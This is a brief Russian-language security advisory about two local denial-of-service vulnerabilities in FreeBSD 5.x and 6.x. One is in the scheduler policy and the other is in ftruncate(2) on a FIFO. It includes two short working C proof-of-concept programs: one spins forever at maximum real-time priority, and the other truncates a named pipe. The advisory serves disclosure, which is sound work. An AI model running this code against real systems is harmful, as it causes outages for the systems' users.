Программа: FreeBSD 5.x, FreeBSD 6.x

Уязвимость позволяет локальному злоумышленнику выполнить DoS атаку на целевую систему.

1) Уязвимость существует из-за ошибки в политике планирования FreeBSD Scheduler Policy. Локальный атакующий может вызвать отказ в обслуживании.

Пример:

#include <sched.h>
int main(){
struct sched_param lol;
lol.sched_priority = sched_get_priority_max(SCHED_FIFO);
sched_setscheduler(0,SCHED_FIFO,&lol);
for(;;){}
}

2) Уязвимость существует из-за ошибки в вызове ftruncate(2). Локальный атакующий может выполнить DoS атаку на целевую систему.

Пример:

#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main(){
mkfifo("lol",0x1b6);
int fd = open("lol",O_RDWR);
ftruncate(fd,12345);
close(fd);
}



Оставить мнение